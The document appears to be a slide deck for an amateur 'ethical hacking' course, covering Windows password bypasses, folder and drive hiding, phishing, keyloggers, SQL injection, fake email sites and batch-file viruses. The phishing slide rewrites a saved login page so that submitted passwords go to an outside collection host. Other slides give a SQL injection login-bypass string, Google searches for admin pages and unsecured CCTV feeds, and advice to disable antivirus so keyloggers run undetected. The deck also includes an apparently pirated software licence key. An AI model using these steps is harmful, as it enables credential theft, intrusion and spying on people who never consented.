ETHICAL HACKING

BY: PRAVAL SHARMA & GAURAV GAUTAM

TO BE A

What is Ethical Hacking?Inside Threats : Operating System

Hacking.Website & Email Attacks.Batch Programing.

Modules:

What is Ethical Hacking ?

A defined “methodology adopted by ethical hackers to discover the vulnerabilities existing in information systems’ operating environments.”

For using Virtual Operating System in your PC or Laptop use VM Ware Workstation Software.

Virtual Machine

Key For VMWARE WorkStation-

M35PM-RP24K-9103V-4QA66

Operating System Hacking

Q. Where the Passwords such as Admin, Login Passwords of the System are Stored ?

Answer: In SAM (Security Account Manager) Files

Passwords are stored in the form of Hashes.

Path: C:\Windows\System32\Config

Types Of Passwords

• LOGIN SCREEN PASSWORDS.• BIOS PASSWORD.• BIOMETRIC PASSWORD.• BOOT PASSWORD.• SYS KEY (SYSTEM KEY) PASSWORD.

• LOGIN SCREEN PASSWORDS.• BIOS PASSWORD.• BIOMETRIC PASSWORD.• BOOT PASSWORD.• SYS KEY (SYSTEM KEY) PASSWORD.

This password will asked by the system just before the Login password.

To enable this password:• Press (RUN) and type SYSKEY in

that.• Select Update.• Then Password Startup.• Then Enter any password & then Press OK.

This password is can be cracked by OPH Cracker or by again installing the Windows.

System key Password

BIOS or BOOT Password

GO TO BIOS SETTINGS…. THEN GO TO SECURITY TAB

BOOT PASSWORD - USER PASSWORD.

BIOS PASSWORD - SUPERVISOR PASSWORD.

BIOS AND BOOT PASSWORD CAN BE CRACKED BY REMOVING THE CMOS BATTERY FOR 5 MINUTES.

BIOMETRIC Passwords

These Passwords can aslo be cracked by Removing the CMOS Battery for 5 to 10 minutes.

Login Passwords

Cracking Login Passwords

By Displaying Command Prompt on the LOGIN Screen.

By using utility of STICKY KEYS

By Creating Backdoors.

LOCKING FOLDERS

By using Change Access Control Lists (CACLS) Command.

- Open CMD (in Windows 7 open CMD as an Administrator) - Use this Command : For Locking the Folder-CACLS <Folder Name> /E /P Everyone :N For Accessing the FolderCACLS <Folder Name> /E /P Everyone :F

Hiding The Local Disk Drives

• Open CMD as an Administrator.• Type the following commands:

• C:\Users\User Account>DISKPART Press Enter• DISKPART> Select List Volume Press Enter• DISKPART> Select Volume <Volume Number>

Press Enter• DISKPART> Remove letter <Drive letter> Press

Enter

YOUR DISK HAS BEEN HIDDEN NOW

FOR ACCESSING YOUR HIDDEN DRIVE

• REPEAT ALL STEPS AS MENTIONED IN PREVIOUS SLIDE.• CHANGE THE FOURTH STEP AS:

• DISKPART> Assign letter <Drive letter> Press Enter

YOUR DISK AS BEEN VISIBLE NOW

STEGANOGRAPHY

Process of Hiding Text in A Image File.To hide Secret Text behind an Image follow these

Steps:

Open CMD. Type in CMD:

COPY /b File1.JPG + Text1.TXT My.JPG Press Enter

YOUR TEXT IS COPIED TO THE IMAGE FILE

Web Site(WWW) & Email Attacks

• Phishing.• Key Loggers.• SQL Injection.• Email Forgery (Fake Emailing).

Phishing

Phishing KNOWING PASSWORD BY MAKING

BROWSER A PHISHING PAGE….. OPEN ANY LOGIN PAGE GO TO FILE THEN, SAVE PAGE AS…. WEB PAGE , HTML ONLY. CLICK SAVE PAGE. OPEN PAGE WITH NOTEPAD. PRESS CTRL+F TO FIND FIND ACTION. THEN PLACE THIS CODE AFTER ACTION

ACTION=“HTTP://CYBERCURE.NET /TESTERS /PRACPH57.PHP? ID=“YOUR EMAIL ID”& LINK=SITE NAME”

Key Loggers

• Key Loggers are the Softwares that keep all the LOG files in its Record of every key pressed on the key board.

• Some of the Key Loggers are:

ARDAMAX Key Logger

Home Key Logger

Family Key Logger

Golden Key logger

And Many More…………..• Warning : Key Loggers can be Detected by the

Antiviruses for that we have to put off our antivirus program

SQL Injection (Website Hacking) • Type any of following points in Google to get Admin

Login pages:• INURL: admin.asp• INURL: adminlogin.asp• INURL: admin.aspx• INURL: adminlogin.aspx• INURL: admin.asp• INURL: admin.php• INURL: adminlogin.php

Try This In Place Of Username & Password :

login’telnet’=‘telnet’

Fake EmailingSome Websites for sending fake emails………

www.fakemailer.info www.fakemailer.net www.fakesend.com

Some free fake mailing Sites……. www.mailz.funfuz.co.uk

www.emkei.cz

Watch Live CCTV Cameras of Foreign Countries

O This Process is known as Google Digging.

O For viewing live CCTV footages just type this code in Google…..

Inurl:view /index.shtml

• Batch Programing is used for Creating small viruses by a simple coding in Notepad for making Harm to

the System.• Just write the Code in Notepad and save your File as

.Bat extension.• For Converting this .Bat file to .exe file use BAT to

EXE Converter.

BATCH PROGRAMING